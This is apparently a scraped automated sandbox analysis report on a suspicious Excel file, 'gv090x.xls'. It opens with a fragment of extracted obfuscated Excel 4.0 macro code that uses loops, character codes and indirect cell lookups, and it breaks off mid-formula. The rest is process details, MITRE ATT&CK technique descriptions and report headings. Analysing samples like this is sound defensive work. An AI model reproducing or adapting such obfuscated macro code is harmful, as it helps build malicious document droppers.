,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"residence=(VALUE(""0""))",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=WHILE(residence<32),,,,,,,,,,,,122,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,130,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,120,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,116,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,reducing=-1,,,,,,,,,,,,98,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,109,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,112,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,129,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,residence=residence+1,,,,,,,,,,,,124,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,130,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"operated=""""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=WHILE(reducing<213),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=SUM(-795,729)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=MAX(-899,-28)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,reducing=reducing+1,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=INDIRECT(ADDRESS(reducing+45,15+residence))",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=IF($B$104=""xHcbSdhJXVO"",SET.NAME(""reducing"",213),SET.NAME(""op

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: EXCEL.EXE PID: 1692 Parent PID: 584

General

Start time:	16:23:38
Start date:	23/02/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f9a0000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report gv090x.xls

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

Sigma Overview

Signature Overview

Compliance:

System Summary:

Hooking and other Techniques for Hiding and Protection:

HIPS / PFW / Operating System Protection Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "gv090x.xls"

Indicators

Summary

Document Summary

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 26461

General

Macro 4.0 Code

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

System Behavior

Analysis Process: EXCEL.EXE PID: 1692 Parent PID: 584

General

Chronological Activities

Disassembly